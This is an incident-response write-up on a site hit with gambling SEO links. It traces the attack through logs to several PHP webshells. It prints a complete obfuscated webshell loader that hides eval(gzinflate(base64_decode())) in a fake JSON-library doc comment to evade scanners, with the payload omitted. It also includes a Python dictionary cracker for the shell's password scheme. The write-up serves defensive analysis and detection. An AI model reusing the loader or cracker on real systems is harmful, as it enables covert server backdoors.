An Incident Response Engagement at a Certain Organization

Preface

A while ago I got a request for help from a platform that had gambling (BC) links planted on it. I took a look for them and, unexpectedly, picked up several webshells that had slipped past the mainstream protection products; after some digging, the evasion technique turned out to be genuinely clever.

Walkthrough

First, look at the state of the site with the planted gambling links.

In search engines the site showed up as having been injected with "parasite" SEO pages that divert traffic.

[screenshot]

Arriving from a search engine result redirected to www.xxxx.com, while typing the address in directly did not, so I judged it to be a JavaScript referer check performing the redirect.

[screenshot]

I then obtained the site's source code and did a global search for that domain, and sure enough found the link.
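The two checks just described, grepping the source for the target domain and inferring a referer-conditional redirect, can be automated. The following Python is an added example, not code from the original write-up: it flags inline scripts that read document.referrer and then assign a location, and, for the server-side variant of the same trick, PHP that inspects $_SERVER['HTTP_REFERER'] and sends a Location header. Both sample pages are constructed for the example; www.xxxx.com is the page's own placeholder for the target, and the cloaking script is an assumed instance of the common pattern, not the one found on the affected site.

```python
import re

# Constructed sample page. The cloaking script is an assumed instance of the
# usual document.referrer pattern, written for this example; it is not the
# script found on the affected site.
SAMPLE_HTML = """<html><head><title>Home</title>
<script>
var r = document.referrer;
if (r.indexOf("baidu") > -1 || r.indexOf("google") > -1 || r.indexOf("sogou") > -1) {
  window.location.href = "http://www.xxxx.com/";
}
</script></head><body>welcome</body></html>"""

# Constructed server-side variant of the same trick, also assumed.
SAMPLE_PHP = """<?php
if (isset($_SERVER['HTTP_REFERER']) && strpos($_SERVER['HTTP_REFERER'], 'baidu') !== false) {
    header("Location: http://www.xxxx.com/");
    exit;
}
"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)
REFERRER_RE = re.compile(r"document\.referrer", re.I)
# location = "...", location.href = "...", location.replace("...")
REDIRECT_RE = re.compile(
    r"location(?:\.href)?\s*=\s*[\"']([^\"']+)[\"']"
    r"|location\.replace\(\s*[\"']([^\"']+)[\"']",
    re.I)
PHP_REFERER_RE = re.compile(r"\$_SERVER\s*\[\s*[\"']HTTP_REFERER[\"']\s*\]")
PHP_LOCATION_RE = re.compile(r"header\s*\(\s*[\"']Location:\s*([^\"']+)[\"']", re.I)


def find_js_referer_cloaks(html):
    """Redirect targets from inline scripts that read document.referrer and
    then assign a location. A script that redirects without consulting the
    referrer is not reported."""
    targets = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        if not REFERRER_RE.search(body):
            continue
        for t in REDIRECT_RE.finditer(body):
            targets.append((t.group(1) or t.group(2)).strip())
    return targets


def find_php_referer_cloaks(php_source):
    """Server-side variant: HTTP_REFERER inspected and a Location header sent."""
    if not PHP_REFERER_RE.search(php_source):
        return []
    return [m.group(1).strip() for m in PHP_LOCATION_RE.finditer(php_source)]


if __name__ == "__main__":
    print("js :", find_js_referer_cloaks(SAMPLE_HTML))
    print("php:", find_php_referer_cloaks(SAMPLE_PHP))
```

Run both functions over every template, theme file and cached page of the site, not only the document root: the same grep for the domain that found the link here is what these do, with the referrer condition added so ordinary navigation scripts are not reported.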

I also asked the site administrator for the access logs of the recent period and went through them. Since I now had the modified file, I searched the logs directly for its filename, and that led to a webshell at ......\caches_data\model_f1eld_0.cache.php

[screenshot]

Here is what the shell looks like in the source; judging from the URI I guessed it was a full-featured shell (大马).

<?php

/**
* Converts to and from JSON format.
*
* JSON (JavaScript Object Notation) is a lightweight data-interchange
* format. It is easy for humans to read and write. It is easy for machines
* to parse and generate. It is based on a subset of the JavaScript
* Programming Language, Standard ECMA-262 3rd Edition - December 1999.
* This feature can also be found in Python. JSON is a text format that is
* completely language independent but uses conventions that are familiar
* to programmers of the C-family of languages, including C, C++, C#, Java,
* JavaScript, Perl, TCL, and many others. These properties make JSON an
* ideal data-interchange language.
*
* This package provides a simple encoder and decoder for JSON notation. It
* is intended for use with client-side Javascript applications that make
* use of HTTPRequest to perform server communication functions - data can
* be encoded into JSON notation for use in a client-side javascript, or
* decoded from incoming Javascript requests. JSON format is native to
* Javascript, and can be directly with no further parsing
* overhead
*
* All strings should be in ASCII or UTF-8 format!
*
* LICENSE: Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met: Redistributions of source code must retain the
* above copyright notice, this list of conditions and the following
* disclaimer. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
* NO EVENT SHALL CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*
* @category
* @package     Services_JSON
* @author     Michal Migurski <mike-json@teczno.com>
* @author     Matt Knapp <mdknapp[at]gmail[dot]com>
* @author     Brett Stimmerman <brettstimmerman[at]gmail[dot]com>
* @copyright   2005 Michal Migurski
* @version     CVS: : JSON.php,v 1.31 2006/06/28 05:54:17 migurski Exp
* @license     http://www.opensource.org/licenses/bsd-license.php
* @link       http://pear.php.net/pepr/pepr-proposal-show.php?id=198
*/
/**
* Converts to and from JSON format.
*
* JSON (JavaScript Object Notation) is a lightweight data-interchange
* format. It is easy for humans to read and write. It is easy for machines
* to parse and generate. It is based on a subset of the JavaScript
* Programming Language, Standard ECMA-262 3rd Edition - December 1999.
* This feature can also be found in Python. JSON is a text format that is
* completely language independent but uses conventions that are familiar
* to programmers of the C-family of languages, including C, C++, C#, Java,
* JavaScript, Perl, TCL, and many others. These properties make JSON an
* ideal data-interchange language.
*
* This package provides a simple encoder and decoder for JSON notation. It
* is intended for use with client-side Javascript applications that make
* use of HTTPRequest to perform server communication functions - data can
* be encoded into JSON notation for use in a client-side javascript, or
* decoded from incoming Javascript requests. JSON format is native to
* Javascript, and can be directly with no further parsing
* overhead
*
* All strings should be in ASCII or UTF-8 format!
*
* LICENSE: Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met: Redistributions of source code must retain the
* above copyright notice, this list of conditions and the following
* disclaimer. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
* NO EVENT SHALL CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*
* @category
* @package     Services_JSON
* @author     Michal Migurski <mike-json@teczno.com>
* @author     Matt Knapp <mdknapp[at]gmail[dot]com>
* @author     Brett Stimmerman <brettstimmerman[at]gmail[dot]com>
* @copyright   2005 Michal Migurski
* @version     CVS: : JSON.php,v 1.31 2006/06/28 05:54:17 migurski Exp $
* @license     http://www.opensource.org/licenses/bsd-license.php
* @link       http://pear.php.net/pepr/pepr-proposal-show.php?id=198
*/
$ffname=""."code(\"
7L1pexvXlS762Xme/AcEzTbIhCJrHkRRcY22HE0W5VFys0ECJGGRAAKAGmzpPnYnTuwkjp2TpDM5U3fScXcndnI6J+14iP/LbYGSP52/cN937yqgqlAAKdudzul7mFgEC7v2uPZa71p7rbU7G+v9Qb03mF9Y+fSnmr1ep7fea3Y7vUGrvT0frUcXLpy7ULlZidbPexfWIhZ6oN8crA9ae8313dZeazCv8OFcr9MZrDdavcpqZW59LbrwWHThUi08Fzx6Jjp7cf3CuXMXa0+jnPzf1n57c9DqtCsX+NaD5+fvn6v3evUbC5/+1HOf/lQFP9d2WrvN+d1WfzA/d6V5Y3Huar23gLqb9c2d+aTwgiyavMGf1tb8fH/QG3T2u91mT7y5UPkMeoQPlZs3K7XaUqs9uFrf
[encrypted payload too long, omitted]
\")));";

/**
* Converts to and from JSON format.
*
* JSON (JavaScript Object Notation) is a lightweight data-interchange
* format. It is easy for humans to read and write. It is easy for machines
* to parse and generate. It is based on a subset of the JavaScript
* Programming Language, Standard ECMA-262 3rd Edition - December 1999.
* This feature can also be found in Python. JSON is a text format that is
* completely language independent but uses conventions that are familiar
* to programmers of the C-family of languages, including C, C++, C#, Java,
* JavaScript, Perl, TCL, and many others. These properties make JSON an
* ideal data-interchange language.
*
* This package provides a simple encoder and decoder for JSON notation. It
* is intended for use with client-side Javascript applications that make
* use of HTTPRequest to perform server communication functions - data can
* be encoded into JSON notation for use in a client-side javascript, or
* decoded from incoming Javascript requests. JSON format is native to
* Javascript, and can be directly with no further parsing
* overhead
*
* All strings should be in ASCII or UTF-8 format!
*
* LICENSE: Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met: Redistributions of source code must retain the
* above copyright notice, this list of conditions and the following
* disclaimer. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.val(gzinflate(base
* THIS SOFTWARE IS PROVIDED AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
* NO EVENT SHALL CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*
* @category
* @package     Services_JSON
* @author     Michal Migurski <mike-json@teczno.com>
* @author     Matt Knapp <mdknapp[at]gmail[dot]com>
* @author     Brett Stimmerman <brettstimmerman[at]gmail[dot]com>
* @copyright   2005 Michal Migurski
* @version     CVS: : JSON.php,v 1.31 2006/06/28 05:54:17 migurski Exp $
* @license     http://www.opensource.org/licenses/bsd-license.php
* @link       http://pear.php.net/pepr/pepr-proposal-show.php?id=198
*/
class Test{
   private $math;
   public function dos($y){
       $a = $this->math;
       return $a("", $y);
  }
   public function get_info(){
       $comm = "";
       try{
           $this->math = strrev("noitcnuf_etaerc");
           $rec = new ReflectionClass("Test");
           global $comm;
           $comm =  $rec->getDocComment();
           throw new ReflectionException();
      }catch (ReflectionException $e){
           $start = strpos($comm,"val");
           $end = strpos($comm,"(base");
           return "e".substr($comm, $start, ($end-$start+5))."64_de";
      }
  }
}
$test = new Test();
$info = $test->dos($test->get_info().$ffname);
$info();

A quick look shows the telltale characteristics of a PHP shell are fairly obvious, yet none of the mainstream protection products flagged it. A short walkthrough of the functional code:

/**
* Converts to and from JSON format.
*
* JSON (JavaScript Object Notation) is a lightweight data-interchange
* format. It is easy for humans to read and write. It is easy for machines
* to parse and generate. It is based on a subset of the JavaScript
* Programming Language, Standard ECMA-262 3rd Edition - December 1999.
* This feature can also be found in Python. JSON is a text format that is
* completely language independent but uses conventions that are familiar
* to programmers of the C-family of languages, including C, C++, C#, Java,
* JavaScript, Perl, TCL, and many others. These properties make JSON an
* ideal data-interchange language.
*
* This package provides a simple encoder and decoder for JSON notation. It
* is intended for use with client-side Javascript applications that make
* use of HTTPRequest to perform server communication functions - data can
* be encoded into JSON notation for use in a client-side javascript, or
* decoded from incoming Javascript requests. JSON format is native to
* Javascript, and can be directly with no further parsing
* overhead
*
* All strings should be in ASCII or UTF-8 format!
*
* LICENSE: Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met: Redistributions of source code must retain the
* above copyright notice, this list of conditions and the following
* disclaimer. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.val(gzinflate(base
* THIS SOFTWARE IS PROVIDED AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
* NO EVENT SHALL CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*
* @category
* @package     Services_JSON
* @author     Michal Migurski <mike-json@teczno.com>
* @author     Matt Knapp <mdknapp[at]gmail[dot]com>
* @author     Brett Stimmerman <brettstimmerman[at]gmail[dot]com>
* @copyright   2005 Michal Migurski
* @version     CVS: : JSON.php,v 1.31 2006/06/28 05:54:17 migurski Exp $
* @license     http://www.opensource.org/licenses/bsd-license.php
* @link       http://pear.php.net/pepr/pepr-proposal-show.php?id=198
*/
class Test{
   private $math;
   public function dos($y){
       $a = $this->math;
       return $a("", $y);
  }
   public function get_info(){
       $comm = "";
       try{
           $this->math = strrev("noitcnuf_etaerc");
           $rec = new ReflectionClass("Test");
           global $comm;
           $comm =  $rec->getDocComment();
           throw new ReflectionException();
      }catch (ReflectionException $e){
           $start = strpos($comm,"val");
           $end = strpos($comm,"(base");
           return "e".substr($comm, $start, ($end-$start+5))."64_de";
      }
  }
}
$test = new Test();
$info = $test->dos($test->get_info().$ffname);
$info();

The code contains a Test class with one member, $math, and two methods, dos and get_info. get_info does the following:

  1. Assigns the reversed string, i.e. create_function, to the member $math
  2. Instantiates a ReflectionClass, which reports information about the Test class
  3. Calls ReflectionClass::getDocComment and assigns the class doc comment to $comm
  4. Throws an exception, which is caught by the handler
  5. Finds the first occurrence of val in the comment
  6. Finds the first occurrence of (base in the comment
  7. Concatenates the pieces into the string eval(gzinflate(base64_de

The shell then instantiates Test and calls dos, which hands that string to create_function to build an anonymous function. At this point the reconstructed code reads create_function("", "eval(gzinflate(base64_de..."); base64_decode is obviously incomplete, so I guessed the rest was stored in $ffname. After spending some time decoding it, the complete code turned out to be create_function("", 'eval(gzinflate(base64_decode("<encrypted shell body>")));'), and the final $info() call runs it.
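To make the evasion concrete, the following Python is an added example (not part of the original write-up and not the shell's own code): it replays get_info() against a trimmed, constructed copy of the sample so the string eval(gzinflate(base64_de can be seen being assembled from the class doc comment, reverses the strrev() literal to expose create_function, stitches in the $ffname tail, and then scores the file on the primitives that do survive static inspection. The trimmed copy's payload "QUJD" is a dummy; the real file's doc comment and base64 blob are far longer.

```python
import re

# Constructed, trimmed stand-in for the captured file. The real sample's doc
# comment is ~50 lines and its base64 payload several KB; only the pieces the
# assembly logic touches are kept, and the payload "QUJD" is a dummy.
SAMPLE_SHELL = r'''<?php
$ffname=""."code(\"QUJD\")));";
/**
 * Converts to and from JSON format.
 * in the documentation and/or other materials provided with the
 * distribution.val(gzinflate(base
 * @package     Services_JSON
 */
class Test{
   private $math;
   public function dos($y){ $a = $this->math; return $a("", $y); }
   public function get_info(){
       $this->math = strrev("noitcnuf_etaerc");
       $rec = new ReflectionClass("Test");
       global $comm;
       $comm = $rec->getDocComment();
       $start = strpos($comm,"val");
       $end = strpos($comm,"(base");
       return "e".substr($comm, $start, ($end-$start+5))."64_de";
   }
}
$test = new Test();
$info = $test->dos($test->get_info().$ffname);
$info();
'''

DOC_RE = re.compile(r"/\*\*.*?\*/", re.S)
CLASS_AFTER_RE = re.compile(r"\s*class\s+Test\b")
STRREV_RE = re.compile(r"strrev\s*\(\s*[\"']([^\"']+)[\"']\s*\)")
FFNAME_RE = re.compile(r'\$ffname\s*=\s*""\s*\.\s*"code\(\\"(.*?)\\"\)\)\);"', re.S)


def doc_comment_of_test(src):
    """What ReflectionClass("Test")->getDocComment() returns: the /** */ block
    immediately before `class Test`, delimiters included."""
    for m in DOC_RE.finditer(src):
        if CLASS_AFTER_RE.match(src, m.end()):
            return m.group(0)
    return None


def replay_get_info(src):
    """Replay get_info(): "e" . substr($comm, strpos("val"), end-start+5) . "64_de"."""
    comm = doc_comment_of_test(src)
    if comm is None:
        return None
    start, end = comm.find("val"), comm.find("(base")
    if start < 0 or end < 0:
        return None
    return "e" + comm[start:end + 5] + "64_de"


def reversed_literals(src):
    """Every strrev("...") literal, reversed: reveals the hidden function name."""
    return [m.group(1)[::-1] for m in STRREV_RE.finditer(src)]


def reconstruct_call(src):
    """(function, body) as create_function("", body) receives them."""
    prefix = replay_get_info(src)
    m = FFNAME_RE.search(src)
    if prefix is None or m is None:
        return None
    payload = re.sub(r"\s+", "", m.group(1))   # base64_decode ignores whitespace
    fn = next(iter(reversed_literals(src)), None)
    return fn, f'{prefix}code("{payload}")));'


# Static indicators that survive the string splitting. None of them is the
# classic eval(gzinflate(base64_decode( signature, which never appears whole.
INDICATORS = {
    "doc_comment_read": re.compile(r"getDocComment\s*\("),
    "strrev_literal": STRREV_RE,
    "var_function_call": re.compile(r"\$\w+\s*\(\s*\"\"\s*,"),        # $a("", $y)
    "comment_substr": re.compile(r"substr\s*\(\s*\$\w+\s*,\s*\$\w+"),
    "long_base64": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}


def indicators(src):
    return {name for name, rx in INDICATORS.items() if rx.search(src)}


if __name__ == "__main__":
    print(replay_get_info(SAMPLE_SHELL))
    print(reconstruct_call(SAMPLE_SHELL))
    print(sorted(indicators(SAMPLE_SHELL)))
```

The point of indicators() is that no signature for eval(gzinflate(base64_decode( can hit this file, because that string only exists at runtime; what a scanner can key on is the combination of getDocComment(), a strrev() literal, a variable function call of the form $a("", ...) and substr() over a variable, none of which is suspicious on its own. Run replay_get_info() and reconstruct_call() on a captured sample to confirm what the runtime would execute without ever running the PHP.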

Part of the decoded shell's code:

[screenshot]

Looking only at the password handling, the check is md5(substr(md5(substr(md5($salt.$post_pass),5)),3)). Because the scheme is custom and salted, a captured shell cannot be run through rainbow tables or a stock cracker mode; recovering the password means brute-forcing this exact construction, which is only hopeless if the password itself is strong, since three rounds of MD5 add essentially nothing to the per-guess cost.
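As an added example (not the shell's code), here is that password scheme in Python together with a dictionary attack against it, using a constructed salt and password. It shows both halves of the point: stock tools will not crack this hash form without a custom rule, but since the salt is readable in the decoded shell, a weak password still falls to a plain wordlist in milliseconds.

```python
import hashlib
from typing import Iterable, Optional


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def shell_hash(salt: str, password: str) -> str:
    """The shell's check, md5(substr(md5(substr(md5($salt.$post_pass),5)),3)),
    with PHP substr($s, n) rendered as s[n:]."""
    h1 = md5hex(salt + password)
    h2 = md5hex(h1[5:])
    return md5hex(h2[3:])


def crack(target: str, salt: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack against the custom scheme. The salt is readable in the
    decoded shell, so the only unknown is the password itself."""
    for pw in candidates:
        if shell_hash(salt, pw) == target:
            return pw
    return None


# Constructed values: a made-up salt and a weak password stand in for the real ones.
SALT = "9f3a"
STORED = shell_hash(SALT, "admin888")
WORDLIST = ["123456", "admin", "password", "admin888", "qwerty"]

if __name__ == "__main__":
    print(STORED, "->", crack(STORED, SALT, WORDLIST))
```

Feed crack() a real wordlist (rockyou-sized lists are a few seconds of work here) to decide whether the operator's password is recoverable and therefore whether the shell can be used for attribution or for reading its configuration.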

Since the logs showed no trace of how the shell got into that deep directory, I concluded the site had more than one backdoor planted. After contacting the person in charge, I advised them to delete this shell, fix whatever vulnerabilities could be found, then back up the whole site (database, images, source) and wait for the attacker's next attack before cleaning up.

Two days later the site indeed had gambling links planted again.

[screenshot]

I then obtained the access logs again and analyzed the attacker's attack chain; see the screenshot for details.

[screenshot]

It showed accesses to ......\languages\en\cntw.lang.php

That file was indeed present in the site source. Opening it revealed an encrypted upload backdoor: when the value received via GET is str, it renders an upload form and can write to any directory (permissions permitting).

[screenshot]
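The log work in both phases of this case, tracing the first shell from the modified file's name and then reading the attack chain that led to cntw.lang.php, follows the same pivot: find which clients touched a known-bad path, then list everything else those clients requested. The Python below is an added example, not the author's tooling, run over constructed combined-format log lines (IPs, paths and timestamps are made up and do not correspond to the site): it parses the lines, pivots on one known-bad filename, and separately lists PHP scripts executed from directories that should only hold data, such as caches or language packs, which is where both shells in this case sat.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# Constructed combined-format log lines; IPs, paths and times are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Sep/2019:08:12:01 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [01/Sep/2019:08:13:44 +0800] "GET /languages/en/x.lang.php?a=str HTTP/1.1" 200 1830 "-" "python-requests/2.22.0"
198.51.100.23 - - [01/Sep/2019:08:14:02 +0800] "POST /languages/en/x.lang.php?a=str HTTP/1.1" 200 210 "-" "python-requests/2.22.0"
198.51.100.23 - - [01/Sep/2019:08:14:30 +0800] "POST /caches/x.cache.php HTTP/1.1" 200 9120 "-" "python-requests/2.22.0"
203.0.113.9 - - [01/Sep/2019:08:15:10 +0800] "GET /about.html HTTP/1.1" 200 2100 "https://www.baidu.com/" "Mozilla/5.0"
198.51.100.23 - - [01/Sep/2019:08:16:00 +0800] "POST /index.php HTTP/1.1" 200 400 "-" "python-requests/2.22.0"
"""

# Directories that hold data, not code, on a typical PHP CMS; a .php request
# under one of these is worth a look. Assumed list, extend it per site.
ODD_DIRS = ("/caches/", "/cache/", "/data/", "/languages/", "/upload/", "/uploads/")


def parse(lines):
    """Parsed entries as dicts; lines that do not match the format are skipped."""
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            out.append(m.groupdict())
    return out


def script_path(entry):
    return entry["path"].split("?", 1)[0]


def pivot(entries, known_bad):
    """IPs that requested known_bad, then every request those IPs made, in log
    order, so the attack chain around one known file can be read off."""
    ips = {e["ip"] for e in entries if script_path(e).endswith(known_bad)}
    chain = defaultdict(list)
    for e in entries:
        if e["ip"] in ips:
            chain[e["ip"]].append((e["ts"], e["method"], e["path"]))
    return dict(chain)


def odd_php_paths(entries):
    """PHP scripts executed from directories that should hold data, not code."""
    return sorted({script_path(e) for e in entries
                   if script_path(e).endswith(".php")
                   and any(d in script_path(e) for d in ODD_DIRS)})


if __name__ == "__main__":
    ents = parse(SAMPLE_LOG.splitlines())
    for ip, reqs in pivot(ents, "x.cache.php").items():
        print(ip)
        for ts, method, path in reqs:
            print("  ", ts, method, path)
    print(odd_php_paths(ents))
```

In the constructed sample the pivot on the cache shell immediately surfaces the earlier GET and POST to the language-directory file with the trigger parameter, which is the same relationship the screenshot above shows between the two real files. Short log retention, as noted later in this write-up, is what limits how far back the pivot can reach.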

Afterword

During the subsequent re-check I also found a one-liner shell (一句话木马) built on the same idea as the large shell, at ....../api/uc_client/data/cache/config.php. Because this organization retains logs for only a short time, the attacker's initial entry vector could not be determined, which was the shortcoming of this response.
